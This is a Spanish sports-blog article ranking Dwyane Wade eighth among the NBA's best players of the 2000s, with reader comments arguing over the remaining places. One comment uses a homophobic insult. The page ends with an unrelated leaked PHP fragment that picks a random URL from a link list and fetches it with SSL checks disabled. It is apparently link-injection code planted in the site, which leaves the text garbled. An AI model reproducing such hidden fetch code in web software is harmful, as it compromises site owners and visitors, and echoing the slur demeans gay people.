Los 10 mejores de la década: Nº08

23 de September de 2010 por Viva_Dirk
Artículo 3 de 10 de la serie Los mejores de la década

8.- DWYANE WADE

Este chico es el único que está en la lista por motivos distintos a los demás. desde luego no porque su calidad desentone ni sus números sean inferiores a los del resto, sino porque al contrario que los otros 9, se encuentra aquí por una sola temporada, pero ¡qué temporada! En la 2005-2006  logró su anillo con la peor plantilla de todas las que lo han ganado en estos 10 años. Solamente eso ya lo hace imprescindible en esta lista.

En su año rookie llevó a los Heat a pasar una eliminatoria de play-offs, llegando a ponérselo realmente difícil a unos Pacers que habían sido el mejor equipo del Este. En sus primeros playoffs y sin destacar tanto en la regular season como otros de sus compañeros de generación, logró unos espectaculares 18 puntos, 4 rebotes y 5 asistencias por partido  en play-offs.

En el verano de 2004 llegaba a Miami Shaquille O’Neal lo que convertía a los Heat automáticamente en candidatos al anillo, suponiendo para Wade tener que responder a las exigencias de forma inmediata. El número 3 de los Heat no defraudó nadie: 24 puntos, 5.2 rebotes, 6.8 asistencias, 1.5 robos y 1 tapón por partido, con un 48% en tiros de campo fueron sus números como jugador de segundo año. Pero esos números  se quedarían todavía pequeños en play-offs, donde los Heat alcanzaron la final de conferencia con un tremendo Wade que subió su promedio anotador hasta los 27 puntos. En esa final de conferencia cayeron por 4-3 frente los Pistons,  pero no era mal premio para un equipo recién formado.

Entonces Pat Riley decidió incorporar a un buen grupo de veteranos formado por Payton, Jason Williams, Posey y Walker, y lo que fue casi tan decisivo como el propio Wade, decidió dejar el despacho y sentarse en el banquillo. A pesar de todos estos movimientos, cuando Miami finalizó la temporada con 52 victorias, parecía lejos de poder disputar la conferencia a unos Pistons que habían logrado 64 victorias y contaban en sus filas con 4 All-Stars. Sin embargo, Miami ganó la conferencia y, una vez en la final, Dwyane Wade completó una de las actuaciones individuales más espectaculares de la historia. Los Dallas Mavericks dominaban la serie por 2-0 y Wade promedió 39.2 puntos en los siguientes 4 encuentros, tras los cuales Miami se proclamó vencedor de la NBA y Wade MVP de la final, con 34.7 puntos de media, la tercera mayor marca de todos los tiempos.

Las siguientes 4 temporadas provocan que Dwwane Wade no ocupe un lugar más alto en nuestra lista. A pesar de ser All-Star en todas ellas y formar parte del quinteto ideal en la 08-09, el balance de los Heat en estos 4 años es de 149-179, y de los 328 partidos disputados Wade se ha perdido 70, dando cierta imagen de indolencia cuando el equipo no estaba en condiciones de aspirar al anillo. Ahora que los Heat vuelven a estar en la pomada, quizá más que nunca en su historia, esperamos volver a ver la mejor versión de Wade, sobre todo en los play-offs, su lugar favorito.

Comenta

21 comentarios a esta entrada

  1. portu dice:
    #1

    No tengo la capacidad analítica suficiente para imaginar los 7 primeros de esta jugosa lista, pero me da la sensación de q aparece demasiado abajo Wade… los mismos méritos q expone Viva me parecen de mucho peso… supongo q alguno sin anillo aparecerá dentro de poco y ya nos tiraremos al cuello, je,je,
    Enorme serie de artículos, felicidades, Viva.

      Citar

  2. CAMPO2 dice:
    #2

    A mi asi de primeras me vienen a la cabeza alguno para los puestos que quedan:
    Shaq
    Duncan
    Garnett
    Novitzki
    Bryant
    kidd
    Nash
    esto escribiendo de carrerilla y sin pensar demasiado

      Citar

  3. CAMPO2 dice:
    #3

    Ginobili

      Citar

  4. Txusma dice:
    #4

    Pues si aparecen Nowitzki, Kidd o Nash tb deberian aparecer Lebron o Iverson, más que nada pq ninguno de los 5 tiene anillos pero todos ellos, a su manera, han supuesto un auténtico impacto en la liga y tienen unos números impresionantes. Y bueno, antes que Ginobili yo metería a Gasol, por ejemplo.

    A mi también me ha sorprendido ver a Wade tan abajo en la lista más que nada pq él si que goza de un anillo del que adolecen unos cuantos. Será complicado argumentar, aunque ya se explica en el artículo, por que unos aparecen más arriba que otros.

    La verdad es que tengo ganas de ver ya a los siguientes.

      Citar

  5. sergio dice:
    #5

    Yo apuesto por:
    1.Bryant
    2.Duncan
    3.Shaq
    4.Garnett
    5.Iverson
    6.Nowitzki
    7.Nash/James (aunque supongo que te declinaras por Nash porque LeBron aun no ha conseguido nada y encima esta empezando)

    Va a ser curioso como jugadores como Gasol, Ginobili, Kidd, Parker (unico MVP de las finales que se quedara sin entrar en la lista)…, no aparecen por aqui

    Supongo que la valía o capacidad e un jugador no está siempre determinada por los anillos. El que Nash o Kidd no tengan anillos me parece algo secundario. Sus equipos no siempre han estado a la altura durante los Playoffs o les ha faltado un elemento determinante (incompetencia del entrenador incluida) para defenderse de las armas contrarias (lo de MacCulloch defendiendo al mejor Shaq en el 2002 fue de risa… o el 21-20-10-8 de Duncan en el ultimo partido de 2003 es para embalsamar a Tim cuando muera). Demosle tiempo a los jovenes como James para demostrar mas cosas en un futuro… y reconozcamos a los que nos han dado durante estos 10 años los mejores momentos y actuaciones.

    A ver con que nos sorprendes Dirk!!

      Citar

  6. TheDeerHunter dice:
    #6

    No fue en el 2002, Sergio… fue en el 2001. Lo de MacCulloch no fue una decisión de risa… fue circunstancial con Mutombo y Geiger que no aguantaban más que unos pocos minutos sin problemas de faltas frente a un Shaq que por aquella época solía eliminar a 3 o 4 interiores por partido.
    Hablando de aquella final hoy marca habla precisamente de ella y lo hace con una serie de artículos hablando de Iverson de una calidad a la que no estábamos acostumbrados ni de lejos.
    Me hace gracia especialmente esto: El ‘sweep’ era la predicción de casi todo el mundo. Allen se lamentaba por aquellos que habían perdido su dinero. “Cualquiera ha apostado por eso, hay mucha gente rota ahí fuera: personas con los sentimientos rotos. Estoy contento de que nadie haya apostado su vida en ello, porque sin duda estaría muerto ahora mismo”. Eran las declaraciones de Iverson hablando sobre la gente que había apostado por la barrida. Recuerdo lo difíciles que fueron para L.A. los dos primeros partidos e individualmente fue algo de lo más increíble que yo haya visto nunca en este deporte.

    No quiero abrir ningún debate. Sed conscientes de que Iverson no aparecerá en esta lista. Por una vez puedo entenderlo si hablamos específicamente de la década. En ella han habido demasiadas sombras en la carrera del 3 de Philly.

      Citar

  7. sergi237 dice:
    #7

    Billups y Pirce enfin….los de Gasol y Ginobili,a su cueva.

    Duncan-Bryant-Shaq-Garnett-Iverson-Nowitzki-Nash-Kidd-LeBron,estos en cualquier orden

    después elegir entre Pirce-Allen-Billups-Wade-McGready-Yao-Brand-Carter-Howard-Amare-Paul-Deron-J’Oneal-Melo

      Citar

  8. TheDeerHunter dice:
    #8

    ¿los de Gasol y Ginobili a su cueva?? ¿y añades a Yao, J.Oneal, Brand, Amare???
    ¿me podrías decir en qué concretamente han sido esos 4 (por no entrar a hablar de Howard) mejores que Gasol esta década (o nunca)?

    El corte para mandar a su cueva al personal es: 18,8 ptos 9 rebotes 3,2 asistencias y 1,7 tapones me temo. Con excelentes porcentajes.
    Y ojo, porque no entro en premios individuales y colectivos por los que casi cualquiera de los que has dado para elegir ahí darían su alma y la de sus familiares.

      Citar

  9. portu dice:
    #9

    No nos anticipemos, pero no me resisto a decir q la carrera colectiva (punto básico en esta lista q ha creado Viva) era primordial en este análisis y entonces Pau Gasol borra a unos cuanto de los q se han nombrado, además ya está en los 30 años, no creo q pueda perder posiciones como podría pasarle a Lebron, Howard o similares por estar a mitad de su carrera, así q hay q compararlo sin tapujos y sin complejos con los Nash, Nowitzki, KG, Pierce, Kidd, Billups, etc, obviamente un peldaño por debajo de Duncan, Shaq y Kobe, pero sin nada q envidiarle a los q mencionaba. Compararlo con Brand o Jermaine o´Neal me parece de risa…

      Citar

  10. arivas dice:
    #10

    Yo tambien estoy intrigado de quienes serán los que faltan (y los que se queden fuera)

    Sin duda el trio Kobe, Duncan, Shaq encabezara la lista, aunque tengo dudas sobre el orden en que los pondrá Viva.
    KG, Nash, Kidd, Dirk creo que van a ser los “elegidos” para los otros 4 puestos. (aunque tampoco tengo claro el orden) mi unica duda está con Lebron, pero creo que se va a quedar fuera por lo que habeis comentado antes.

    En cualquier caso, grandes artículos Viva.

      Citar

  11. Viva_Dirk dice:
    #11

    Siento el retraso del Nº7, estaba terminado y he sufrido un problema tecnico que estamos intentado solucionar.

      Citar

  12. Jabho dice:
    #12

    Lebron e Iverson se van quedar fuera, al tiempo. No veo a Viva argumentando como podría dejar fuera de los mejores de la década a uno entre Kobe, Duncan, Shaq, KG, Dirk, Nash y Kidd. Sin embargo se me ocurren argumentos para no meter a Iverson y Lebron….

    La visión de cualquiera sobre los 10 mejores de la liga sería discutida y la de Viva no va a ser menos. Pero estoy seguro que el dará sus argumentos y algunos los compartiremos y otros no…

    Gasol y Manu me encantan, pero no han hecho méritos para estar entre los 10 mejores… en mi opinión.

      Citar

  13. Viva_Dirk dice:
    #13

    Para dar algo de que hablar hasta que solucionemos lo del Nº7, nadie ha acertado de momento los 7 restantes al completo, jeje.

      Citar

  14. Txusma dice:
    #14

    Yo no he dicho que Gasol tenga que estar entre los 10 primeros pero vaya creo que si podría empezar a ser considerado entre los 15 y por supuesto yo lo colocaría por encima de Manu.
    Los 3 primeros están claros con Kobe, Duncan y Shaq. Para mi el tercero de la lista es Big Diesel y dudo una enormidad entre a quien elegir en primer lugar. Para los otros 4, imposible ponerse de acuerdo pero no sé quien puede salir fuera de los Dirk, Garnett, Kidd, Nash… Seguro que Lebron no entrará? De hecho, Lebron ha hecho mejores campañas que Wade y su equipo siempre, menos en una ocasión, ha llegado más lejos. Tal es el valor añadido q da el anillo como para meter a Wade en la lista y dejar fuera a Lebron?

      Citar

  15. Kiki dice:
    #15

    Sabiendo que quien escribe es viva_dirk, la pregunta es si tendrá arrestos a poner a Nowitzki de nº1 como le gustaría, o por detrás de Kobe. La polémica está servida…
    En cuanto a los comentarios anteriores, dudar de que LeBron deba estar en esta lista (llegó a la liga en 2003, debut vs. Sacramento, partidazo de base) me parece grotesco. Ha ganado los dos últimos MVP sin discusión, llevando a los Cavs al mejor récord de la NBA en ambas temporadas. Su fracaso en playoff y que nos caiga rematadamente mal es otra cosa. Es, junto a Kobe y Wade, el mejor jugador de la actualidad. Y ha estado entre los 3-4 mejores desde que llegó hace siete años.
    Los números lo dicen. Me extraña que nunca se destaque su media de asistencias (7 en su carrera, 8,6 …!! la última campaña), que demuestra que no juega para sí mismo, como se le critica. El show que le acompaña o su actitud sí son discutibles; sus condiciones, estadísticas y rendimiento, no.
    Ha jugado 5 All-Star Games, ganando 2 mvp (más 2 años rookies game). Cuatro veces en el mejor quinteto de la NBA en 7 temporadas. Y un dato más: ha sido elegido 28 veces jugador del mes en la Conferencia Este desde que llegó a la NBA. Sin comentarios.
    La única pregunta es si va a seguir a ese nivel a sus 25 años para poder empezar a considerarlo entre los más grandes de siempre, o si ha habido algún jugador con su nivel a su edad en la Historia del Baloncesto. Muy pocos, o ninguno. He visto artículos que lo demostraban, más allá de todos los récords de precocidad que ha batido, que no tienen porqué demostrar nada ya que la mayoría de grandes jugadores de la Historia han llegado a los 21 ó 22 años a la Liga tras graduarse en su College. Él lo hizo con 18.
    Si no pasa nada raro, ganará varios anillos en el próximo lustro con los Heat, para disipar cualquier duda.

      Citar

  16. rojorob dice:
    #16

    ¿Si acierto los siete que faltan cuenta un punto para el trivial de esta temporada?

      Citar

  17. Txusma dice:
    #17

    Ui! El trivial… Se avecinan novedades.

    Yo apuesto tb por Lebron pero es q no sé a quien sacar de Garnett, Kidd, Nash y Dirk… Tal vez este último.

      Citar

  18. Uno cualquiera dice:
    #18

    Pues yo apuesto a que el podio será para Kobe, Duncan y Shaq, sin saber el orden.

    Y para los puestos entre el 4º y el 7º creo que Viva_Dirk se decantará por KG, Nash, Dirk y LeBron (también sin orden).

    Kidd y Iverson se quedan fuera… :/

      Citar

  19. portu dice:
    #19

    Lebron debería estar, para mi es el mejor de los q no tienen anillo. Y como creo q se quedan fuera gente como Kidd y AI por no tener anillo frente a gente como Pierce o Billups, siguiendo esa línea creo q tb debería caerse de la lista Nowitzki para dejar hueco a KG y Gasol… pero eso no creo q ocurra, je,je, y ya tendremos tiempo de opinar…

      Citar

  20. Nacho dice:
    #20

    Kiki, siento contestarte a ti (lo digo porque lo podría haber hecho con cualquier otro comentari) como haríamos todos. Pero LeB me pone de los nervios. No voy a negar que es un excelente jugador, y que podrá ser el mejor de la historia si madura (VA SIENDO HORA) y alguien de su entorno le explica lo que es este juego.
    POR FAVOR KIKI CUIDADO AL HABLAR DE NÚMEROS, y más en el caso de LeB.
    ASISTENCIAS ES UN CONCEPTO VACUO, más en el caso que nos ocupa. Es probable que hasta Dampier llegara a las 5 as/partido si manejara tanto tiempo de posesión como James ( y no le diera un telele, claro)
    NO KIKI NO.
    LeB SÍ JUEGA (y pierde) PARA SÍ MISMO.

      Citar

  21. el experto dice:
    #21

    miren lebron mucho a echo pa el poco tiempo q lleva y kobe ya es un viejo ylebron es el mejor JORDAN+LEBRON=KINGS OF KINGS KOBE+NASH=KINGS OF GAYS

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>